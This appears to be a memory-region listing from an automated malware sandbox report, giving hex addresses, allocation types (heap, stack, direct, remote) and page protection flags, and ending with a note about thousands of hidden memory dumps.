|
page read and write
|
||
C21000
|
unkown
|
page execute and write copy
|
||
7FFD9BA26000
|
trusted library allocation
|
page read and write
|
||
3798000
|
heap
|
page read and write
|
||
26CC2728000
|
heap
|
page read and write
|
||
378B000
|
heap
|
page read and write
|
||
1DE8F000
|
stack
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
88B000
|
heap
|
page read and write
|
||
735000
|
heap
|
page read and write
|
||
115F000
|
stack
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
3767000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
1BBD0000
|
heap
|
page execute and read and write
|
||
70E000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
7FFD9B99D000
|
trusted library allocation
|
page execute and read and write
|
||
2E3F000
|
stack
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
376A000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
4FC0000
|
trusted library allocation
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
551F000
|
stack
|
page read and write
|
||
B98000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
212B5380000
|
heap
|
page read and write
|
||
37AD000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
7FFD9B984000
|
trusted library allocation
|
page read and write
|
||
4AB0000
|
direct allocation
|
page execute and read and write
|
||
37B8000
|
heap
|
page read and write
|
||
37B0000
|
heap
|
page read and write
|
||
1DFEB000
|
stack
|
page read and write
|
||
45FE000
|
stack
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
374E000
|
heap
|
page read and write
|
||
8BC000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
48FE000
|
stack
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
537E000
|
stack
|
page read and write
|
||
29FF000
|
stack
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
375B000
|
heap
|
page read and write
|
||
777000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
504E000
|
stack
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
378F000
|
heap
|
page read and write
|
||
3130000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
3777000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
7AC000
|
heap
|
page read and write
|
||
1FA3FEA0000
|
heap
|
page read and write
|
||
37AD000
|
heap
|
page read and write
|
||
8CD000
|
heap
|
page read and write
|
||
547F000
|
stack
|
page read and write
|
||
3787000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
413E000
|
stack
|
page read and write
|
||
3DFF000
|
stack
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
7C9000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3746000
|
heap
|
page read and write
|
||
340F000
|
stack
|
page read and write
|
||
85A000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
7FFD9B9B3000
|
trusted library allocation
|
page execute and read and write
|
||
800000
|
heap
|
page read and write
|
||
3789000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
8C0000
|
heap
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
3780000
|
heap
|
page read and write
|
||
249113F0000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
37B9000
|
heap
|
page read and write
|
||
7BD000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
3765000
|
heap
|
page read and write
|
||
BBB000
|
heap
|
page read and write
|
||
8B5000
|
heap
|
page read and write
|
||
F2B000
|
unkown
|
page execute and write copy
|
||
37B5000
|
heap
|
page read and write
|
||
353F000
|
stack
|
page read and write
|
||
1790000
|
trusted library allocation
|
page read and write
|
||
5500000
|
direct allocation
|
page execute and read and write
|
||
4841000
|
heap
|
page read and write
|
||
249117E0000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
3767000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
4E60000
|
direct allocation
|
page execute and read and write
|
||
912000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
3752000
|
heap
|
page read and write
|
||
AD9000
|
heap
|
page read and write
|
||
3743000
|
heap
|
page read and write
|
||
781000
|
heap
|
page read and write
|
||
37AF000
|
heap
|
page read and write
|
||
4A10000
|
direct allocation
|
page execute and read and write
|
||
A14000
|
heap
|
page read and write
|
||
7FFD9B9A4000
|
trusted library allocation
|
page read and write
|
||
3780000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
37C7000
|
heap
|
page read and write
|
||
4C60000
|
direct allocation
|
page execute and read and write
|
||
912000
|
heap
|
page read and write
|
||
2491146A000
|
heap
|
page read and write
|
||
4E50000
|
direct allocation
|
page execute and read and write
|
||
32BF000
|
stack
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
3758000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
8FC000
|
stack
|
page read and write
|
||
16F5000
|
heap
|
page read and write
|
||
1C680000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
3789000
|
heap
|
page read and write
|
||
1354000
|
heap
|
page read and write
|
||
373B000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
7A1000
|
heap
|
page read and write
|
||
1F0000
|
trusted library allocation
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
6A10000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
1570000
|
heap
|
page read and write
|
||
2FD0000
|
heap
|
page execute and read and write
|
||
4940000
|
trusted library allocation
|
page read and write
|
||
7FFD9B994000
|
trusted library allocation
|
page read and write
|
||
828C000
|
stack
|
page read and write
|
||
A90000
|
heap
|
page read and write
|
||
10C1000
|
unkown
|
page execute and write copy
|
||
38FF000
|
stack
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
8BC000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
37A3000
|
heap
|
page read and write
|
||
3754000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
376A000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
3751000
|
heap
|
page read and write
|
||
423F000
|
stack
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
3506000
|
trusted library allocation
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
2D3E000
|
stack
|
page read and write
|
||
212B542F000
|
heap
|
page read and write
|
||
C62A4FE000
|
stack
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
58A1A7F000
|
stack
|
page read and write
|
||
1C3E0000
|
heap
|
page read and write
|
||
133E1000
|
trusted library allocation
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
1E57E000
|
heap
|
page read and write
|
||
2E10000
|
heap
|
page read and write
|
||
433E000
|
stack
|
page read and write
|
||
3CBF000
|
stack
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
212B53FF000
|
heap
|
page read and write
|
||
3924000
|
trusted library allocation
|
page read and write
|
||
D50000
|
heap
|
page read and write
|
||
379F000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
333E000
|
stack
|
page read and write
|
||
2BFF000
|
stack
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
377F000
|
heap
|
page read and write
|
||
26CC26F0000
|
heap
|
page read and write
|
||
16F0000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
3774000
|
heap
|
page read and write
|
||
7FFD9B9A3000
|
trusted library allocation
|
page execute and read and write
|
||
373E000
|
heap
|
page read and write
|
||
406000
|
unkown
|
page readonly
|
||
7B5000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
2D8F164C000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
7FFD9BA3C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B99B000
|
trusted library allocation
|
page execute and read and write
|
||
95D000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
7B0000
|
trusted library allocation
|
page read and write
|
||
37C8000
|
heap
|
page read and write
|
||
15953065000
|
heap
|
page read and write
|
||
4C70000
|
direct allocation
|
page execute and read and write
|
||
3B4000
|
heap
|
page read and write
|
||
376A000
|
heap
|
page read and write
|
||
4A10000
|
direct allocation
|
page execute and read and write
|
||
C30000
|
trusted library allocation
|
page read and write
|
||
80000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
4AA0000
|
direct allocation
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
37CA000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
26DB000
|
stack
|
page read and write
|
||
37BB000
|
heap
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
212B53EB000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
2D8F1500000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
11F0000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
3787000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
35F7000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
3787000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
5C2000
|
heap
|
page read and write
|
||
963000
|
heap
|
page read and write
|
||
37CD000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3786000
|
heap
|
page read and write
|
||
37F4000
|
heap
|
page read and write
|
||
374E000
|
heap
|
page read and write
|
||
1DFDEF5F000
|
heap
|
page read and write
|
||
972000
|
heap
|
page read and write
|
||
157A000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
9E6000
|
heap
|
page read and write
|
||
2D1F000
|
stack
|
page read and write
|
||
4D7F000
|
stack
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
3782000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
375D000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
212B5400000
|
heap
|
page read and write
|
||
249113C0000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
3301000
|
trusted library allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3790000
|
heap
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
7FFD9BA86000
|
trusted library allocation
|
page execute and read and write
|
||
3767000
|
heap
|
page read and write
|
||
F3A81FF000
|
stack
|
page read and write
|
||
7AC000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
C50000
|
trusted library allocation
|
page read and write
|
||
37C8000
|
heap
|
page read and write
|
||
760000
|
heap
|
page read and write
|
||
4EF0000
|
direct allocation
|
page execute and read and write
|
||
15952CF7000
|
heap
|
page read and write
|
||
37BA000
|
heap
|
page read and write
|
||
392F000
|
stack
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
BC0000
|
heap
|
page read and write
|
||
4E80000
|
direct allocation
|
page execute and read and write
|
||
373B000
|
heap
|
page read and write
|
||
E01000
|
unkown
|
page execute and write copy
|
||
7BB000
|
heap
|
page read and write
|
||
3790000
|
trusted library allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
7FFD9B994000
|
trusted library allocation
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
373E000
|
stack
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
2CDF000
|
stack
|
page read and write
|
||
720000
|
remote allocation
|
page read and write
|
||
377F000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
BF8000
|
heap
|
page read and write
|
||
377B000
|
heap
|
page read and write
|
||
37B5000
|
heap
|
page read and write
|
||
37B1000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
1D0E000
|
stack
|
page read and write
|
||
8E3000
|
heap
|
page read and write
|
||
37BB000
|
heap
|
page read and write
|
||
762000
|
heap
|
page read and write
|
||
3799000
|
heap
|
page read and write
|
||
2B90000
|
heap
|
page execute and read and write
|
||
2D6E2A48000
|
heap
|
page read and write
|
||
DE599FF000
|
unkown
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
C90000
|
trusted library allocation
|
page read and write
|
||
60E000
|
stack
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
7FFD9BA66000
|
trusted library allocation
|
page execute and read and write
|
||
37B3000
|
heap
|
page read and write
|
||
1250000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
7FFD9BB17000
|
trusted library allocation
|
page read and write
|
||
49FE000
|
stack
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
1E578000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
C70000
|
trusted library allocation
|
page read and write
|
||
2B7E000
|
stack
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
3405FF000
|
stack
|
page read and write
|
||
37C8000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page execute and read and write
|
||
376A000
|
heap
|
page read and write
|
||
755000
|
heap
|
page read and write
|
||
323E000
|
stack
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
378D000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
3789000
|
heap
|
page read and write
|
||
A90000
|
remote allocation
|
page read and write
|
||
376A000
|
heap
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
1D39E000
|
stack
|
page read and write
|
||
4C30000
|
direct allocation
|
page execute and read and write
|
||
800000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
2FA1000
|
trusted library allocation
|
page read and write
|
||
212B53FD000
|
heap
|
page read and write
|
||
37AD000
|
heap
|
page read and write
|
||
37A7000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
375A000
|
heap
|
page read and write
|
||
1BFA0000
|
heap
|
page execute and read and write
|
||
3743000
|
heap
|
page read and write
|
||
1C74E000
|
stack
|
page read and write
|
||
1DFDEFBD000
|
heap
|
page read and write
|
||
7FFD9B983000
|
trusted library allocation
|
page execute and read and write
|
||
26CC274A000
|
heap
|
page read and write
|
||
212B542F000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
29FF000
|
stack
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
C20000
|
unkown
|
page read and write
|
||
1BB3C000
|
stack
|
page read and write
|
||
2FBE000
|
stack
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
C21000
|
unkown
|
page execute and write copy
|
||
1D55E000
|
stack
|
page read and write
|
||
7B9000
|
heap
|
page read and write
|
||
6FA000
|
stack
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
446F000
|
stack
|
page read and write
|
||
7A1000
|
heap
|
page read and write
|
||
7CC000
|
heap
|
page read and write
|
||
619E000
|
stack
|
page read and write
|
||
F2A000
|
unkown
|
page execute and read and write
|
||
87A000
|
heap
|
page read and write
|
||
F3A87FC000
|
stack
|
page read and write
|
||
7FFD9B9B2000
|
trusted library allocation
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page execute and read and write
|
||
D55000
|
heap
|
page read and write
|
||
37C9000
|
heap
|
page read and write
|
||
37AF000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
12FA1000
|
trusted library allocation
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
8BC000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3E7F000
|
stack
|
page read and write
|
||
3D2E000
|
stack
|
page read and write
|
||
3796000
|
heap
|
page read and write
|
||
1BB8C000
|
stack
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
40F000
|
unkown
|
page write copy
|
||
37AC000
|
heap
|
page read and write
|
||
8CD000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
3743000
|
heap
|
page read and write
|
||
33E1000
|
trusted library allocation
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
3762000
|
heap
|
page read and write
|
||
37CB000
|
heap
|
page read and write
|
||
1DFDEF8E000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
31A0000
|
heap
|
page execute and read and write
|
||
1DBEE000
|
stack
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
37F4000
|
heap
|
page read and write
|
||
93C000
|
heap
|
page read and write
|
||
3605000
|
trusted library allocation
|
page read and write
|
||
53A1000
|
direct allocation
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
1E070000
|
heap
|
page read and write
|
||
8BC000
|
heap
|
page read and write
|
||
378E000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
3747000
|
heap
|
page read and write
|
||
1DFDEF20000
|
remote allocation
|
page read and write
|
||
379B000
|
heap
|
page read and write
|
||
7FFD9B984000
|
trusted library allocation
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
3554000
|
trusted library allocation
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
62DE000
|
stack
|
page read and write
|
||
1B0000
|
heap
|
page read and write
|
||
7C3000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
8CC000
|
heap
|
page read and write
|
||
22798EF0000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
37AE000
|
heap
|
page read and write
|
||
7E3000
|
heap
|
page read and write
|
||
376A000
|
heap
|
page read and write
|
||
2ADE000
|
stack
|
page read and write
|
||
B81000
|
heap
|
page read and write
|
||
8CE000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
3744000
|
heap
|
page read and write
|
||
1D3EE000
|
stack
|
page read and write
|
||
378F000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3A6F000
|
stack
|
page read and write
|
||
3F3F000
|
stack
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3AAE000
|
stack
|
page read and write
|
||
8CA000
|
heap
|
page read and write
|
||
E2E000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
9F4000
|
stack
|
page read and write
|
||
37D4000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
1E04E000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
1296000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
414000
|
unkown
|
page readonly
|
||
4DA5000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
3789000
|
heap
|
page read and write
|
||
44BF000
|
stack
|
page read and write
|
||
B8F000
|
heap
|
page read and write
|
||
414000
|
unkown
|
page readonly
|
||
802000
|
heap
|
page read and write
|
||
1C0A0000
|
heap
|
page execute and read and write
|
||
12FA9000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page execute and read and write
|
||
406000
|
unkown
|
page readonly
|
||
3773000
|
heap
|
page read and write
|
||
AF0000
|
heap
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
8AF000
|
stack
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
37C7000
|
heap
|
page read and write
|
||
F14000
|
unkown
|
page execute and read and write
|
||
802000
|
heap
|
page read and write
|
||
4540000
|
trusted library allocation
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
A29000
|
heap
|
page read and write
|
||
3774000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
3765000
|
heap
|
page read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
35C1000
|
trusted library allocation
|
page read and write
|
||
A0E000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
4A60000
|
direct allocation
|
page execute and read and write
|
||
7A6000
|
heap
|
page read and write
|
||
7FFD9B9B4000
|
trusted library allocation
|
page read and write
|
||
1900000
|
heap
|
page read and write
|
||
44BF000
|
stack
|
page read and write
|
||
1A0000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
There are 3044 hidden memdumps, click here to show them.